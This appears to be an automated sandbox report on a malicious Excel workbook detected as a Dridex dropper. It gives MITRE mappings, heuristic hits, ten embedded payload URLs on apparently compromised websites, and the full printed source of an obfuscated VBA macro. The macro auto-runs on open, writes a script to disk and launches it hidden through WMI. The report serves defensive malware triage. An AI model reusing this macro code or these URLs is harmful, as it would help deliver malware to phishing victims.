MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a Workbook_Open VBA macro that utilizes GetObject calls, a common technique for executing obfuscated code. ClamAV detections explicitly identify this as a Dridex dropper. The macro's obfuscated nature and the presence of multiple unknown URLs suggest it is designed to download and execute a second-stage payload, consistent with Dridex's typical behavior. The file was likely delivered as a spearphishing attachment.
Heuristics 8
-
ClamAV: Doc.Dropper.Dridex-9845759-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
AGoC7naD = Join(Array(RnhUc_0mGp_A5p7, XnKjbQS8Tt5kjyfz, "ZbzgSoQCr9G5DNNa EPuP_CMO_p6c_cky5 N5lJt_JxI_Wrvj" & TVznAGfXZcYDsij)) Set Z0uyTRuCfZG = GetObject(Pdbh_D1y_Xo6X.JEnmks0(SoQuh6S)).SpawnInstance_ For HVZ6lJX8BD3QrIdy = 0 To CLng(((-1.36514522821577 * -241) Or (-376 - -424#))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Workbook_Open() RmCf70hcpWRP73vj = Hz38c_5Xym_qMp0_BXu.SB9SS_Eju_hed -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Next Fuypb_0YHD_G6hL_lfoP V0Pd_rph_Reh_coo = Environ(R3U6_ewF_Yaj) GGYxcjq06OkXYjA = InStr(G8ldY_dpw_97A_F3G, ovDuidchJpl, ASdAgMySnwfgh2p) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.dnoticias24.com/wp-content/plugins/js_composer/config/buttons/BbSgkXA0huKmf3.php In document text (OOXML body / shared strings)
- https://rccgewa.org/wp-includes/sodium_compat/src/Core32/ChaCha20/SbpVCDMihCI.phpIn document text (OOXML body / shared strings)
- https://industrialtintotex.com/txt/logs/mem/asd/images/yNLUavmQsy4b.phpIn document text (OOXML body / shared strings)
- https://atiasado.co.il/cp/css/fa/css/xkkPwwNz.phpIn document text (OOXML body / shared strings)
- https://psychologynewmind.com/wp-content/plugins/contact-form-7-datepicker/js/jquery-ui-timepicker/pjtxXrSw.phpIn document text (OOXML body / shared strings)
- https://konjdecor.com/wp-content/plugins/facebook-for-woocommerce/includes/test/RcXOOj6IZWWbop.phpIn document text (OOXML body / shared strings)
- https://mail.terafar.com/public/app/Http/Controllers/Product/I8Ap8slHFevhqqx.phpIn document text (OOXML body / shared strings)
- https://responcepat.id/wp-includes/js/tinymce/plugins/charmap/JN7BIm0zcePnK.phpIn document text (OOXML body / shared strings)
- https://grupolopez.pe/see/lib/classes/Swift/ByteStream/2mDggjjBzp.phpIn document text (OOXML body / shared strings)
- https://rifaee-bros.com/older/dncxBAnrr.phpIn document text (OOXML body / shared strings)
- http://www.w3.org/1999/XSL/TransformIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14006 bytes |
SHA-256: c3747d700872a47405aac096e6ca92e3cae25d4c6693a3adb1fcf52538094879 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
197 of 355 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
RmCf70hcpWRP73vj = Hz38c_5Xym_qMp0_BXu.SB9SS_Eju_hed
Debug.Print WJn42_sM49_Hxh_jkTB
For PA2xlEsJ3DXvM5jD3 = 0 To CLng((1057 And 1467))
DPUefHr = PA2xlEsJ3DXvM5jD3
Next PA2xlEsJ3DXvM5jD3
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hz38c_5Xym_qMp0_BXu"
Function BZMrmJdv(ejZk_PbyL_NLZ)
TiosBZPU1 = InStr(GNBGd0smh82rL, UioTuCrk1zzbxSSX, qXtlvJx)
For IRtQ_eDE_KaV_fmt = 0 To CLng(((xlDialogAxes - -185#) Or xlDialogPivotFieldGroup))
OE60OhBY1RQd = IRtQ_eDE_KaV_fmt
Next IRtQ_eDE_KaV_fmt
Debug.Print MU2U_3FMU_1USR_0MxY
JFbynv5I2 = CLng((1399 And 1910)) > CLng(((865 - 775#) Xor xlDialogFindFile))
OhVP8KcQFBpGt = Len(Join(Array(B0KFArfoyFUc, JJoe_3VG_aA7_k39 & "xLV64dAL4VvTcy")))
z0pWWETANZv = CLng(((989 + 272#) And 3935)) < CLng(((976 - (268 - -241#)) And 1003))
NlJ1D_wGd_7aM_CbW = CLng(((1636 + -243#) + -336)) > CLng((Not (-0.210526315789474 * (1.3202416918429 * -331))))
BZMrmJdv = Hex(CLng((CLng((50848 Or 60569)) - CLng(((3904 + -160#) Or 6532)) + CLng((1.04854368932039 * 7725))) * Rnd + CLng(((1.08829404714343 * 2503) Or (7725 + 211#)))))
ZTJl_o3Q_HhK_NsX = Len(Join(Array("k4uZ_L9sG")))
VcVH_jP0_C5c = CLng((Not ((-317 + 312.452380952381) * -126))) < CLng((859 - ((0.852012383900929 * -1615) + 807#)))
X8gW93gb0bhRgA = Wmcoyuv
ho9CLs55ZEfrOUMv = "JkHIU_Hts_H8Wt"
Dd0PMZC = InStr(Camp43QqCq0UjBq, ikH97_Bbcp, EQ93_fXa_QXeA)
End Function
Function V0Pd_rph_Reh_coo(R3U6_ewF_Yaj)
MeqSK_arl_RSB4 = Len(Join(Array("FnmI_G8E_19l" & XSx928CD)))
Debug.Print Y4XhZe6dW
For bo0h_3YC_tnAx_nZMz = 0 To CLng((Not ((-1705 - -265#) - -729#)))
NxoW_Crr8_F21m_A53 = bo0h_3YC_tnAx_nZMz
Next bo0h_3YC_tnAx_nZMz
Debug.Print rYTCC00jha
For Fuypb_0YHD_G6hL_lfoP = 0 To CLng((397 Or ((-225 + 202#) + 879#)))
Pqou1jbPQnt = Fuypb_0YHD_G6hL_lfoP
Next Fuypb_0YHD_G6hL_lfoP
V0Pd_rph_Reh_coo = Environ(R3U6_ewF_Yaj)
GGYxcjq06OkXYjA = InStr(G8ldY_dpw_97A_F3G, ovDuidchJpl, ASdAgMySnwfgh2p)
Debug.Print R4MP_Mt0R_HYz
xB616_QWb0_T1P = Array(PcQ1vXwac1r9, "Dk0w_IZd1_xjY" & cK9dSafzIXS & "QdE4OnxJFtpzV T5gC_MUnw_VVBf BqHdfxg6dQ2SWws", dx05_aj9q, FnuIOFZ1 & "Oq8T_ZPQA F9LS_U7D_tbrM yqDCna3n7er9GHy" + "ZSkw_VrT_MxFp sQ0a_bjy", "NMqV_KrW_d944_d9C TclVD6OCnV" + "SYl4_ciFe_gFr_QV76 RhbRUKSN7r95OXU F62udq6" + "FI7DB5wlIry9 OVfPQRT ySeebwrgZ0v", "irUC2fqGGXLk PcOas_j9g qXYgl_L0r" & "JFzyq_D8MW FyH7rQMBC j1peHnFtQTsmdls", "WxBzV_CC1_stYH_zvZ3")
U6g5X_dLY_UE8 = t6qn_SjJ_Yog
MoOg6y6PO = FDeM_G2O_f5V_DAw
ApdmU_QUC_5i9_Asw = Join(Array("ASILTOznLTk", "QVuoU_wFTa_rhJz_iMS Sa0WY_4uWC_UAe_gQCa", GNd0j69WoVLXB, ZyVb_MvYs_ARpt_5Woc, HxiN_kmBi_Algm_Nx06 & "IowA_ram_lNkO_8gK odUo_bvO4_7oa_JUpI" & "rY94_np1T_Ruz6", XIislwHF434dh0 ^ znt0Mf3, esTBtyBTmUT))
FLW5n_f7J_Vrk = Array(ujaLlMMHlwb7w & P18N5URvxiX, KIvkGfOv17K & I4nvV_90r)
For SCeONLJu2dsMMgqp = 0 To CLng(((-263 - -518#) And 167))
QgjE_06M = SCeONLJu2dsMMgqp
Next SCeONLJu2dsMMgqp
B05wqFJAGU0 = InStr(R0Fa0hPswrap2dS, EbCU2Jt6Dn0hba, S7M5qIs3V)
End Function
Function SB9SS_Eju_hed()
'bRpS4_NtiY XVQNS_tpND_hUIn_BNWH M7cOYWtkNnKeph C7iY_uXj JxRT_SV4M_H6O QCUwnE99F1HI WGsP_3Gob_MMX5 hLbkO_RjD
Dim lcnpg2yHlUr4zqT As String
lcnpg2yHlUr4zqT = VfA44_ywK.L3YPhPtfX.Text
hCp7_V2bp_NG90_GcC = j0ps_cIn_2Sw & V0Pd_rph_Reh_coo(ZrLs6_0ZaB_a74k_0kS.NIcL6NJqnl) & yU0VS_GtA1 & qgxY_2qZ_CO0.TJf6CQM2OZ(YRZk3_G4Ip_oym) & Q1Ww_BZL_UwC_TwF & EFYs_p3j_vTzU_lfrX & EmHmbvIRX & ZoOpb_A6Z & Hz38c_5Xym_qMp0_BXu.BZMrmJdv(JwC1o_1nNG_ZnJ2) & XPwtV_0AJq_CgQ_T8c & tol9K_IXke_YR3W & qgxY_2qZ_CO0.YnNQrVnZvOuEka(g3gYW_6UCU)
Open hCp7_V2bp_NG90_GcC For Binary As #CLng((-927 + 928))
Put #CLng((xlErrorBarIncludeBoth And xlUnlockedCells)), , lcnpg2yHlUr4zqT
For XPqc_T7n_v4Su = 0 To CLng(((-347 - -850#) And 337))
K1QrCoDM = XPqc_T7n_v4Su
Next XPqc_T7n_v4Su
Close #CLng((962 + -961))
zTjkS_0y1d_DQIT_uKde = ERpGIjHEccQA5W0n.AmVn_wq2(ZF02yuv.e6pZEKMxk(YX7yd_nk2_Our6_Z2w), ZF02yuv.Lmk6_CsDl_crV & hCp7_V2bp_NG90_GcC & Chr(34), X43qPIkn.Z0uyTRuCfZG)
End Function
Attribute VB_Name = "ZrLs6_0ZaB_a74k_0kS"
Attribute VB_Base = "0{6F9081C1-7DE5-4FD8-AEFD-56A7F23F0A3D}{0911A6E6-5228-4BEB-850B-37017A90C107}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NIcL6NJqnl()
NIcL6NJqnl = Join(Array(ChrW(CLng(((0.98019801980198 * (854 - -55#)) - 794))) + ChrW(CLng((125 And ((-926 - -710#) - -328#)))) _
+ ChrW(CLng((-0.368421052631579 * (-429 + 125#)))) + ChrW(CLng((Asc("d")))) + ChrW(CLng((xlLineMarkers Or xlCylinderBarStacked100))) + Chr(CLng((AscW("t")))) _
+ ChrW(CLng(((173 + 557#) + -633))) _
))
RVsQU9TZAK0QJ0vqS = Join(Array(EYYz_70ap & "FnXj_QYYL_8T0", IuGUo_RUy_FKTh_EyD1 & "YOdP7_jugV QUR83gYc" & "RtQP_yQb", XCUlp_aas_yUY_Qz33, I7DB_1lw_FwTD_Rwx & "ScQ0_aNB"))
AVdj5Pbs = Len(Join(Array(MrGr6_Ml1, TGLy3swEhV5H & "FuiA9xkT0IIkb" & gfbO_j19_u4nW_Ef9u, "vpjQ_mNJ_aIG")))
End Function
Attribute VB_Name = "qgxY_2qZ_CO0"
Function TJf6CQM2OZ(jaqk_z2k)
TJf6CQM2OZ = Chr(CLng(((-244 + -471#) + 807))) _
End Function
Function YnNQrVnZvOuEka(HWGp1dbHVAf)
YnNQrVnZvOuEka = ChrW(CLng((AscW(".")))) + Chr(CLng(((-0.087248322147651 * -149) Xor 117))) _
+ ChrW(CLng((((-4.97321428571429 * -112) - 684#) - -242))) + Chr(CLng((Asc("l"))))
End Function
Attribute VB_Name = "ZF02yuv"
Function Lmk6_CsDl_crV()
Lmk6_CsDl_crV = Join(Array(Chr(CLng((-880 - (-1652 + 653#)))) _
& ChrW(CLng((-653 + 762))) & ChrW(CLng((Asc("i")))) _
& ChrW(CLng((xl3DColumnStacked Xor (675 - 591#)))) _
& ChrW(CLng((xl3DColumnStacked100 And ((-11 + 10.9103773584906) * -424)))) _
& Chr(CLng(((xlListDataTypeChoiceMulti + (-775 - -879#)) Or xlFormatFromLeftOrAbove))) & ChrW(CLng((AscW("s")))) & Chr(CLng((xlPaperEnvelopeC65 Or xlNoRestrictions))) & Chr(CLng((-0.132561132561133 * -777))) & ChrW(CLng(((-1662 + 941#) + (1.47048300536673 * 559)))) & Chr(CLng((Not (-764 - -647#)))) & ChrW(CLng((xlRangeAutoFormatTable2 And (6.47948164146868E-02 * 926)))) & Chr(CLng((xlDisplayUnitLabel Xor 49))) & Chr(CLng((-686 + 788))) _
& Chr(CLng((xlColumnStacked + (577 + -518#)))) & ChrW(CLng(((0.046448087431694 * xlDialogErrorChecking) Or xlPyramidCol))) & ChrW(CLng((Asc("m")))) & ChrW(CLng((Asc("a")))) & ChrW(CLng(((484 + -360#) And 118))) & ChrW(CLng((0.280193236714976 * ((-680 - -514#) + 373#)))) & ChrW(CLng((xlScrollBar Xor xlUnicodeText)))))
Debug.Print TeYITYtIFNPFLtt
DqkLdPFg = JueITC9
End Function
Function e6pZEKMxk(Z0RF_dYZ)
e6pZEKMxk = Join(Array(ChrW(CLng(((795 + -676#) And (0.114724480578139 * 1107)))) _
+ ChrW(CLng((Asc("i")))) _
+ ChrW(CLng((Not ((-7.18725718725719E-04 * 286) * xlDialogChartSourceData)))) + ChrW(CLng((xlXYScatterLines Xor xlExcel7))) _
+ ChrW(CLng((((792 + -791.661333333333) * 375) And xlConeBarStacked))) _
+ Chr(CLng((-0.130227001194743 * (-946 - (0.17986798679868 * -606))))) + ChrW(CLng(((174 - 47#) And (762 - 646#)))) + ChrW(CLng((-0.203180212014134 * (-697 + (0.929078014184397 * 141))))) + ChrW(CLng((AscW(":")))) + ChrW(CLng(((1316 + -550#) + -652))) + ChrW(CLng((xlPaperEnvelopePersonal Or xlXYScatterLinesNoMarkers))) + ChrW(CLng((AscW("o")))) + ChrW(CLng((0.363636363636364 * xlDialogOptionsEdit))) + ChrW(CLng((xlPieOfPie Or xlDialogFormatLegend))) _
+ Chr(CLng(((0.125480153649168 * 781) Or xlLineMarkersStacked100))) + ChrW(CLng(((618 - -179#) + -692))) + ChrW(CLng((((-0.11864406779661 * 590) - 46#) + xlDialogFormatMain))) + Chr(CLng(((0.118421052631579 * 1064) And (-67 - -186#)))) + Chr(CLng((-159 + ((633 - 632.774541531823) * 927)))) + ChrW(CLng((xlPrintInPlace Or (-154 + 196#)))) + ChrW(CLng((-0.171259842519685 * (xlDialogAlignment + -551#)))) _
+ Chr(CLng((xlRangeAutoFormatTable10 Or (7.64635603345281E-02 * 837)))) + Chr(CLng((1035 + -925))) _
+ Chr(CLng(((xlDialogFormatMain + -224.850439882698) * 341))) _
+ Chr(CLng((-676 + (0.476690741956665 * 1523)))) + Chr(CLng((856 + (-1615 + 854#)))) + ChrW(CLng((xlRadarMarkers And xlDialogUnhide))) + Chr(CLng((-865 - -979))) _
+ ChrW(CLng(((512 - 401#) Or xlLowerCaseRowLetter))) + ChrW(CLng((xlDialogActiveCellFont + (xlDialogAddinManager + -698#)))) + Chr(CLng((AscW("e")))) + ChrW(CLng((-437 - -552))) + ChrW(CLng((AscW("s"))))))
Fc7X7qYmSv9Prr = CLng((Not -628)) < CLng((Not (446 - -110#)))
Gqkcp_CLP = "OF4QgkqjY"
End Function
Attribute VB_Name = "VfA44_ywK"
Attribute VB_Base = "0{DC1D0E7D-812F-46FA-BFD2-E6CDEACAF6B8}{7F12ADE6-8F05-48C1-8DD7-5959D9DD3A31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function uFiW15SGSgI(GRIPUe1D20Ts)
uFiW15SGSgI = Chr(CLng((Not ((-1419 + 899#) + 485#)))) _
End Function
Attribute VB_Name = "Pdbh_D1y_Xo6X"
Attribute VB_Base = "0{444EEEA0-EC0F-42E7-9A90-320C10A1D6A5}{E3D6466D-2564-4A29-AFF9-FF313A5B9C00}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JEnmks0(KdhWZTxmZ)
JEnmks0 = Chr(CLng((0.228406909788868 * (xlDialogCustomViews - (-729 + 701#))))) + ChrW(CLng((Asc("i")))) + Chr(CLng((xlDialogDefineName Xor xlSurface))) + ChrW(CLng(((467 - 467.145917001339) * (1.32212389380531 * -565)))) _
+ ChrW(CLng((((1578 - 708#) - 798#) Xor xlDialogColumnWidth))) _
+ ChrW(CLng((xlAccounting4 Xor 124))) _
+ ChrW(CLng((116 Or xlDialogFormulaFind))) + Chr(CLng((xlSurface Or (-414 + 462#)))) + ChrW(CLng((-702 + (0.467117393976644 * 1627)))) + Chr(CLng((-687 + 779))) _
+ ChrW(CLng((Not (451 + (-1374 + 808#))))) _
+ Chr(CLng((((-781 + 781.501997336884) * 1502) + -643))) _
+ Chr(CLng((Asc("o")))) _
+ Chr(CLng((xlDrawingObject Xor 122))) + ChrW(CLng((Not -93))) + Chr(CLng(((xlDialogEditboxProperties + -359#) Xor xlMDY))) + Chr(CLng((Asc("i")))) + ChrW(CLng((Not -110))) + Chr(CLng((-433 - -551))) + Chr(CLng((Asc(xlSplitByValue)))) + Chr(CLng((Asc(":")))) + Chr(CLng((898 - 811))) + ChrW(CLng((Asc("i")))) + ChrW(CLng((AscW("n")))) + Chr(CLng(((0.493939393939394 * -330) - -214))) + ChrW(CLng((AscW(xlLeftToRight)))) + Chr(CLng((Not (-555 + 459#)))) _
+ Chr(CLng((-20 - (-866 - (1.79391100702576 * -427))))) + Chr(CLng((AscW("r")))) + ChrW(CLng(((588 - 588.155244755245) * -715))) + ChrW(CLng(((3.70353982300885 * -226) + 936))) + Chr(CLng((Asc("e")))) + ChrW(CLng((AscW("s")))) + ChrW(CLng(((0.20268972142171 * -1041) + (-606 + 932#)))) + Chr(CLng(((-27# * xlParamTypeVarBinary) Or xlPaperEnvelope9))) + ChrW(CLng((Asc("t")))) _
+ Chr(CLng((xlCylinderBarStacked100 Or xlNoIndicator))) + ChrW(CLng(((-745 + 763#) Or xlCylinderBarStacked))) + ChrW(CLng((116 Or xlPaperLedger))) + Chr(CLng((265 + (-1029 - -881#)))) _
+ Chr(CLng(((-265 + 281#) Or xlPyramidCol))) _
IbBMYzq = InStr(XUyGX_HkGr_ob8, PQ0ianmy8sQR, QkcVd_2ZyB)
Debug.Print U72U_tA6y_wMY
End Function
Attribute VB_Name = "X43qPIkn"
Function Z0uyTRuCfZG()
MbYV_krt_7Y0z = "615"
XlY0KorYy6y = "116"
re6L_Jts7_A38j_wnD = Array("LUpbu_N8x_21H0_IvNC BVNJ8_llb", oWmub4Ys)
AGoC7naD = Join(Array(RnhUc_0mGp_A5p7, XnKjbQS8Tt5kjyfz, "ZbzgSoQCr9G5DNNa EPuP_CMO_p6c_cky5 N5lJt_JxI_Wrvj" & TVznAGfXZcYDsij))
Set Z0uyTRuCfZG = GetObject(Pdbh_D1y_Xo6X.JEnmks0(SoQuh6S)).SpawnInstance_
For HVZ6lJX8BD3QrIdy = 0 To CLng(((-1.36514522821577 * -241) Or (-376 - -424#)))
PnQCc_dT7n_iQf = HVZ6lJX8BD3QrIdy
Next HVZ6lJX8BD3QrIdy
BiXRGyvQYtrphvj1 = CLng((((184 - -656#) - 164#) - -377)) < CLng(((697 - -179#) Xor (1683 + 294#)))
JGNy4_Hpf = CLng(((-5.5 * xlDialogFormatFont) - (0.736791546589817 * -1041))) > CLng((0.589894736842105 * (-2362 + -13#)))
For OqTq_M3SS_WGeB_Xcy = 0 To CLng((1460 - xlDialogGalleryDoughnut))
o2LLm2lMRRix = OqTq_M3SS_WGeB_Xcy
Next OqTq_M3SS_WGeB_Xcy
Z0uyTRuCfZG.ShowWindow = CLng((xlWide Xor (-2.81954887218045E-02 * -532)))
TFLMH_8VR = Len(Join(Array("myRohIT9Y55RA JlAnH_Af50 THp0dI63HjP" & DNBzM_teto_VDe_16OO ^ LQt0jvb6Hp, "IA0mi_HN6 Yg40_Cwv_iGXR" + "PxR0_KS7_8Br LFOhP_yIxr_GP0_QxS" & KzPX_FrHm, HKmj8VuB, "UJJjW_tc39" & WErdl_dq81_mNB_EIY, QJpE3IVfK1shC4dT, "ERunLKjS UCemDRSEz9y DnIq_se12_f5C5" & jcEQd_d0A, "Is0FMXn DhBEHuXAr9Vm" & fCCCyeRa & "RJWKb_UIC_OSb Vu1LZ_RfzW", "IBrW58cRw9620vB JeBituMOL" + "RKLn4_j4ll_fuC_ox2R swoCQZT2W He3y4_t16_5Wmn" + "CGp7a_WjI_xDJt_ApTh")))
ScNyDtvsbEOw = "987"
e5lQIjNOErsPoU = Qy582oOJgvEaSTIxv
S1B5ysCLVqAxC = Abs(CLng((Not (267 + 887#))))
nc0Z32S5csIVICF = BznynvtwFTEN2il
For A1NDA_TBw = 0 To CLng((Not (-414 + (748 - 443#))))
Kyg04dZe7M = A1NDA_TBw
Next A1NDA_TBw
End Function
Attribute VB_Name = "ERpGIjHEccQA5W0n"
Function AmVn_wq2(C8ZvOwT6, VnHuIiE2pzcSOmY, UHah_IRoA_ImP)
VJYL_KC5 = BtHRf6Q0s
X0GzZRc8q5a = InStr(nUN8xWFQ0M5j9Ck, JEZwAT3IH, DQmDJ_1Ds_fDtD_STE)
Debug.Print pnY3OvnhSNEFW6x
uMl4QuS1F7iO = "RYhrpptOXIGLzW"
With GetObject(C8ZvOwT6)
Debug.Print TIMO1_g1s1_tgtS
For RQvOaSemypQjFA = 0 To CLng((859 And (xlDialogFilterAdvanced + 571#)))
SPMEFPjF0 = RQvOaSemypQjFA
Next RQvOaSemypQjFA
.Create VnHuIiE2pzcSOmY, Null, UHah_IRoA_ImP
End With
ST9eX7NG5Fkdhu = InStr(Xqja_THHV_zYQ_XKQ, a0dy_jq3_mVZ_Csb, AZVI_r32G_vAp_O2Sx)
'Bbo9X_tm1 UmJw_tvLw ELVd_JylB_WI4_2a6A Kv47_CUi_WNnP GbXC_Tuj FR0RnOaWdzL0Llo7
YDMDwt78NfWFplp = LgARk_EUc_BUm_WjZ
seXRwEIGd = Abs(CLng((((1190 + -888#) + -301.373873873874) * -1776)))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 65536 bytes |
SHA-256: c3666b935ea7c8cf60ba97f2f0728b4f54ac2f8157455649d353d14aa0056eff |
|||
|
Detection
ClamAV:
Doc.Dropper.Dridex-9845759-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.